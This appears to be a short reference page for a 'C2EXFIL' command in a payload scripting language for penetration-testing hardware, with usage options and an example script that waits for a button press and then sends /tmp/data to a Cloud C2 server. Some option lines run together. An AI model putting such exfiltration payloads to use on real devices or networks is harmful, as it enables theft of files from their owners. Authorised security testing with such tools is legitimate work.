C2EXFIL
Options
C2EXFIL /tmp/some-file
C2EXFIL /usb/logs/some-fileC2EXFIL STRING /tmp/some-file.txt
C2EXFIL STRING /usb/logs/some-other-file.txtExperimenting

Examples
Last updated
#!/bin/bash
# Title: Cloud C2 Exfil Button
#
# Description: A simple payload that sends a file to Cloud C2 when a button is pressed
# Set the netmode to NAT, otherwise there is no connectivity at all
NETMODE NAT
# Set the LED to blinking cyan
LED C SINGLE
# Wait forever until the button is tapped
BUTTON
# Send /tmp/data to C2; we assume this file exists for some reason
C2EXFIL /tmp/data
# Set the LED to blink blue in a triple pattern
LED B TRIPLE